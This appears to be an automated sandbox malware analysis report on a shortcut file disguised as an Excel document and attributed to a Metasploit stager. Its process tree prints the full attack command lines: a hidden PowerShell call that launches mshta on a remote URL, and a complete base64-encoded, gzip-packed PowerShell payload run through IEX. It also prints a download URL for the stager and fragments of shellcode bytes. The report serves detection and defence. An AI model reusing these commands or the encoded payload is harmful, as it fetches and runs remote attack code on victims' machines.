Edit tour

Windows Analysis Report
__.xls.lnk.bin.lnk

Overview

General Information

Sample name:	____ ______.xls.lnk.bin.lnk
Analysis ID:	1638546
MD5:	b4daab40e7fdd5199b16314565bdebfd
SHA1:	cf2023322ea444d571a64449daf3507060a466c3
SHA256:	3d7b626032ae4cf35965ddddde19df6653342090b76d97bfa420b82776597a4c
Tags:	lnkuser-TornadoAV_dev
Infos:

Detection

Metasploit

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious encrypted Powershell command line found

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Metasploit Payload

Yara detected MetasploitPayload

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Sigma detected: MSHTA Suspicious Execution 01

Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Suspicious powershell command line found

Uses an obfuscated file name to hide its real file extension (double extension)

Windows shortcut file (LNK) contains suspicious command line arguments

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7472 cmdline: "C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVABOAEkANwAwAEIAQQBBAEIAZwA1AEoAZwA1AHAANgBNAFkARwA2AFYAbQAzADgARgBuAGoALwBHADcAeABmAFMAOAB3AHYATQBMAGsAWQBuAFEANgB5AFYAaQBiAGkAVQB6ADgAbgBSAGIAcABjADcAbAAvAHMANABuAHEANQBlADIATwB5ADUAQwAwAG0AdwBKAGsAWQBoADkAdQArAGwAYQBCAE8AeQB5AGkATABXAEsAMwBhADcASwBZADcASwBWAGMAMgBXAGkAYwBlAEMASAB0AHgAdQBCAHMASwBKAGoAeAA3AGUASgBvADcAVQBaAEQAbABrAFIANwAxAGQAZABrAFcAMABvAGYAeABrAEIANgB0AEoASwAzAEwAdAA5AEkAcwBsAFYASwB6AFQAegBkAEYARwB2AGEAOQA3AGcAYgBDAFMAdABvAC8AaABJADkATQB1AG0AMAB4AFQAaQBUAHQAVgBaAGgATAB2AHUAeQBHAEMAUwAvAHQAZQBYAFoANAB1AHcAdgBGAGoAdQB2ADEAVABuAHEATwA4AHQAbwB5AFkANQBaAHoAUwBmAHkAeQBIAEkAaQB0ADQAVABRAFIAaQAvADEARABhAGQAOABYAGQAMQB3AHYAaABQAEUALwBwAEQAMABYAGoAawBDAHUAMgA0AG0AQwBmAHUAYQAwAGsARABEAHEAbwBMAGwAcwBaADAAMwBTAFIAWgBaADcAeQBPACsAbgBWAHcAYgBOAEQASwBhADUASwBrACsARgBTAEQAVQBDAFIAMQA0AHkAbQBqAGgAUwBYADIAOQB6ADgAQQBuADgATQBwAHAARABuAFgAYgBnAE0AUQA2AFkAbQBZAFcAbQAzAFUAdAAyAHcAOABKAGYAMQBKAGQAMwBkAGoAQQBhAFMAYwBOAFIAYgB2AFIAYwBYAHMAcgBWAHoASwBZAEoAdgBZAHQAZgBjAFgATwA4AGUATQAxADMAWABaAEIAWABXADgARABKAHcAYwBnAFYAdgBkAFYAeABEAHYAWgBjAHoATwB5ADUASwB1AGYARABSADMAVQBBAE4AbgBiAHAAegBHADAATgBWAFQAawA4AHMAQgB1AHAARQAvAE8ARwA0AGIAdwBhADUAbwBFAHgAbQBBAFgAZQBXADMATwA3AEYAMgBTAGwAZgBjAE0ANQBaAE0ANABrAGUAUgBpAFoANQBMAEUANQB0AHIAYQB0AFAAQQA4ADYAaAByAFMAUgBEAHIASQBkAGsAZQBsADgAMQBJAG0AdABuAEkAdABrAEQAeQAzADcASwAxAEwAbwBIAGMAawBMAGQAOQBRAFQAWQBDAHkAUQBBADIAMABZAGUAdQA2AEEAWABUAHcAMAArAFgAdQB3AEcAMwBDAEsAQQBqADUAWQBiAGYASABSAFIAOAAzAHgALwBVAHgAOQB0AFoAdAA5ADIAYwA1AGoAeQBaAFAAeQA4AFgAMwBIAEEAOQAxAGQAbwBqAFIAaABuAGgAZQB3AE0AZgBVAFgATwBpAEQAVgBlAEoAMQBWAEIAWgBmAFIAVABEAHAANgA0AEMAZgB0AGUAMQBOAGoAUgBoAE4AdQAvAEcAVwBqADIAVgBxAHYAZgB4AEIAeQA1ADUAYQBnAEUAUQBrAFkATABuAEQAYQAzAGcANgB0AHMAWAB2ADEAMgBEADYAMABTAFcAdgBvADAAegAzAGsANwBmAFoATQBVADQAMwBTAEsAOQAvAHkAYgBmADMAaAA4AGIAYQByAHIALwBmAEQAagBSAHMASwB5ADAARgB6AHcAYQBtAGUASgB2AFEASABFADgAWgBlAHMASQB3AHoAbQBEAEcAMgBZAGoARABPAGcANQBuADEAdQBBAG0AagBqAGcAMgAvAHoAMAAzAHAAUwBEAEcAMQB3AC8ASQA0AHYAMQA2AGEAZgBuAGUAcwBZAGQAVQBFAFAASwB5AEcAbgBYAHQAVABvAEoAVQBaADMAUgA0AFAAUgBBAGsASgBHAFcAMwB4AG0AYQA5AHcAKwB0AG8AWQByAGgAVgAxAGsATABlAGkAUgA3AC8AUAA2AGwAaQBkADgAOQBzAGUAWgAwADcAMABtAGUAYgByAGcANABHAG0ARABrAHkAdABmAFcAdQB6AHYAWQBGADUAMgBpAHQANgByAGMAaQBlAEwARQBRAGQAaQA0AE8ASgA3AHYATgBnAGIAegA0ADUAKwBBAG8AdgA5AEIAVwBkAGYAbABTAE4ANgBXAGcARwBhAHgAWQAvADYAUwB1AG0AbQA2AFgAMwBzAHgARwByAEMAUQB0AHoAbQByAFcAMwA1AHEAVABZAEUANgBsADYAMwArAGQAMQBFAGQAOQBQAHMAaQA2AHYAMAB3AHYAUgBwAEUAZAB6AEgAZgBRADYARwBIAHoAVQAyAHAANAB1AEwATgBUAHAAdwBlAGUAWAAvAG0ARgBoACsATAAyAHgANQBtAFkAegBYAGwAZAA0AHIAcQBuAGYAbQB4AE4ASABtAFkAbwBzAHYANQB6AGIAdgBLAGoAUgAyAG8AQgBWAG0ANQBOAEoATgBOAFIAOQBaAHMANwAzAE4AVgBVADQAdQBQAHgAawBPAGwAawBJAGEAMABrAFYAcwBwAEEASAAvAHkAWABkAFYAWAAzAGQANwAwAHMAbQAxADQAcQBrAHIAdQA0ADgAMwBuAEwAcgBUAGoASQBSAHgAcQAzACsAeABtAFcAMgAzAFkAeABjAGsAYwBEAG4AaAB2AGYAdABqAEEAbAB4AEoAbwA4ADcARAA2AE4AbABQAHUAMAArADQATgBTADAAcgA3AEkAWgAyADkAbQBoAGkAQwBYAHkAZgBoADMAYQBmAFcAeABmADcAUgBtAGwATwBkAEMAMABqAGQARgA3AG0ATABsAHoAaQBFAFUAZgBiAHkAQwBPAFgAeQBHAG0AWgBYAGcAMgBVAGwATwBYAFUAYwB2AEoARABoAEIAagB5AFcAaQBuAHkAQgB6AGsAeQB6ADcASwA3AGYAdABZAGMASQBSAGsAdwAwAEsATwAyAE0ATwBwAHIAQwB4AG4AdQA4AHgANQB2AFkAMQBTAGQAZAA2ADIAWABGADkASwBPAGMAagB4ADUAUQBCAGQAOABmAEsATwBmAEwARwBiAFEAcABzADEASgA3AFEANgBtAFQANQB1AEIAaQB0AEcAOQB0ADIANwB1ADYASgB1AHIAYwBJAFkATwBwAEgAWAAxACsASgA2AC8AeQBkAFYARABLADQAeABvAFUANgAxAEMAUwBvAFMAbABMAHAAeQArAHUAcQBxAFgAcgBRAEkAcAA0AFUAbgBtAEgAawB1AE8ANwBwADMAcgA5AGYATABBAHkAaAByAHQAbwBzAGkAVgA1AGIAQgB2AGYAVwB1AHUASAAzAFcASgBTAGwAVwBuAEsAdwB0AEQARQBVAFAATwBwADMAegBQAFMAVwBHAHMAWABqAHEAVgA4AGEAaABWADAAagBVAGEAaAArADMAMgBEADYASwBBADQAUwBoAC8AWQBRAEcAOQBWAHoAZABXAFkAeABEAHUAKwBpAHcAUABtAGwAMQBvAE4AOAA3AGQAbQBIAFAAYwBJAHQATgBZAE4AaQA4AC8AWABCAFUAcAA5ADQAMgBRAGwAdAAxADkARwBtAFoAcgBsAFoAbABGADMATAB5ADgATgB5AE0AbgBUAGQAKwAvAGIAbwBBADkAeABwAHYARABNAG8AbwBjAE0AbQA2AFEAZABHAEgASgBrADMAVAB4AFgAKwBMAHIAbABmACsAbgBCAFEAdQBqAFAATABhAFMAVgBtAGoANgBNAEQAZQBvAGYAaABwAEIAWgBkAFcANgBpAGYAZQA0AHoAVABZAG8AdgA4AGoAOQBiACsAWQAvAE8AKwBrAEYAcgBTAFYATABkAHcAYgBhAFMAVwBnAGoANQBtAHEAVgA2AHIAZgBLAGgAVgBwAFIAYgAyAGIAVAA3AHgAWAArAEUAQgBCAE8ANgBwAGIAeABsAHgAQwByAEoAaABjAGIAOABJAGwAZgBNADIAVQAxADMAUAB0ADAAcQBwAFQAawBqAEMAbgBMAGkAMwBxAEIAMwBVAE4ANwByAEYASgA4AHgAWQArAGEAVwBJADMATABlADUAcQA2AHUAZABYADIAbgBjAHEAcwA3AHkAagA4AEgAZABLAFIAegBhAEMATAB2AHQANgBGAEMANABoAFIAaABHADAAWABZAFgANgBVAHQARgBaAEEATwBiAC8AQgBRAFAAaQBmAHgASAArAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAKAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7812 cmdline: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7684 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://mcnn.ru/jquery-3.3.1.slim.min.js"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x21f6:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x9d:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Shellcode_Generic_8c487e57	unknown	unknown	0x0:$a: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0
00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x7:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x90:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
00000003.00000002.2000051277.000001E1C2463000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000003.00000002.2000051277.000001E1C2463000.00000004.00000800.00020000.00000000.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x8c7f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xa427:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x9227:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xa9cf:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x9313:$s5: = [System.Convert]::FromBase64String( 0xaabb:$s5: = [System.Convert]::FromBase64String( 0x8f3b:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xa6e3:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x9165:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0xa90d:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x1bcdd:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
00000003.00000002.2000051277.000001E1C0ADA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000003.00000002.2000051277.000001E1C0ADA000.00000004.00000800.00020000.00000000.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x136cf:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x13c77:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x13d63:$s5: = [System.Convert]::FromBase64String( 0x1398b:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x13bb5:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x1219d:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
00000003.00000002.2000051277.000001E1C2433000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000003.00000002.2000051277.000001E1C2433000.00000004.00000800.00020000.00000000.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x39ca:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3f72:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x405e:$s5: = [System.Convert]::FromBase64String( 0x3c86:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x3eb0:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000003.00000002.1997538671.000001E1BE6F0000.00000004.00000020.00020000.00000000.sdmp	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0x719b:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
00000003.00000002.2000051277.000001E1C2482000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000003.00000002.2000051277.000001E1C2482000.00000004.00000800.00020000.00000000.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x1577:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x1b1f:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x1c0b:$s5: = [System.Convert]::FromBase64String( 0x1833:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x1a5d:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000003.00000002.2000051277.000001E1C243E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000003.00000002.2000051277.000001E1C243E000.00000004.00000800.00020000.00000000.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0xb7b:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x1123:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x120f:$s5: = [System.Convert]::FromBase64String( 0xe37:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x1061:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000003.00000002.2000051277.000001E1C1D34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000003.00000002.2000051277.000001E1C082F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	Windows_Shellcode_Generic_8c487e57	unknown	unknown	0x1383a4:$a: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0
00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x1383ab:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x138434:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x96b:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x209f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x37d3:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x4f5e:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xf13:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x2647:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3d7b:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x5506:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xfff:$s5: = [System.Convert]::FromBase64String( 0x2733:$s5: = [System.Convert]::FromBase64String( 0x3e67:$s5: = [System.Convert]::FromBase64String( 0x55f2:$s5: = [System.Convert]::FromBase64String( 0xc27:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x235b:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x3a8f:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x521a:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xe51:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x2585:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x3cb9:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x5444:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
